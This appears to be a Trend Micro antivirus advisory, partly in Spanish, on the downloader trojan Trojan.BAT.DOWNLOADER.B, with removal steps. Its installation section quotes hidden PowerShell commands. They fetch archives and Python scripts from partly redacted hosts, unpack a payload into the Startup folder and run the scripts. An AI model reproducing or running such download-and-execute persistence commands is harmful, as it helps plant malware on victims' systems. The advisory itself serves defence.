Trojan.BAT.DOWNLOADER.B
Trojan:Script/Wacatac.B!ml (MICROSOFT)
Windows
Tipo de malware
Trojan
Destructivo?
No
Cifrado
No
In the Wild:
Sí
Resumen y descripción
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Intenta acceder a determinados sitios Web. No obstante, no se podrá acceder a los sitios Web de este modo.
Detalles técnicos
Detalles de entrada
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Instalación
Agrega los procesos siguientes:
- start Chrome https://www.{BLOCKED}ress.us/
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://{BLOCKED}e.store/Document.zip -OutFile C:\Users\Public\Document.zip
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\Document.zip -DestinationPath C:\Users\Public\Document
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://{BLOCKED}e.store/4DUONGKHACHTRUNG.zip -OutFile C:\Users\Public\WindowsSecure.zip"
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\Users\Public\WindowsSecure.zip -DestinationPath C:\Users\$([Environment]::UserName)\AppData\Roaming\Microsoft\Windows\'Start Menu'\Programs\Startup
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://{BLOCKED}e.store/rmv -OutFile C:\Users\Public\Document\rmv.py
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\Users\Public\Document\python C:\Users\Public\Document\rmv.py
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://{BLOCKED}e.store/4DUONGKHACHTRUNG -OutFile C:\Users\Public\Document\project.py
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\Users\Public\Document\python C:\Users\Public\Document\project.py
Técnica de inicio automático
Este malware infiltra el/los archivo(s) siguiente(s) en la carpeta de inicio de Windows para permitir su ejecución automática cada vez que se inicia el sistema:
- Extracted content of WindowsSecure.zip
Rutina de descarga
Este malware descarga el archivo desde la siguiente URL y le cambia el nombre al almacenarlo en el sistema afectado:
- https://{BLOCKED}e.store/4DUONGKHACHTRUNG.zip -> renamed to %Public%\WindowsSecure.zip
- https://{BLOCKED}e.store/rmv -> renamed to %Public%\rmv.py
- https://{BLOCKED}e.store/4DUONGKHACHTRUNG -> renamed to %Public%\project.py
Otros detalles
Intenta acceder a determinados sitios Web. No obstante, no se podrá acceder a los sitios Web de este modo.
Soluciones
Step 1
Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.
Step 2
Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.
Step 3
Buscar y eliminar estos archivos
- %Public%\Document.zip
- %Public%\WindowsSecure.zip
- %Public%\Document\Document.zip
- %User Startup%\{Extracted contents of WindowsSecure.zip}
- %Public%\Document\rmv.py
- %Public%\Document\project.py
- %Public%\Document.zip
- %Public%\WindowsSecure.zip
- %Public%\Document\Document.zip
- %User Startup%\{Extracted contents of WindowsSecure.zip}
- %Public%\Document\rmv.py
- %Public%\Document\project.py
Step 4
Explorar el equipo con su producto de Trend Micro para eliminar los archivos detectados como Trojan.BAT.DOWNLOADER.B En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.
Rellene nuestra encuesta!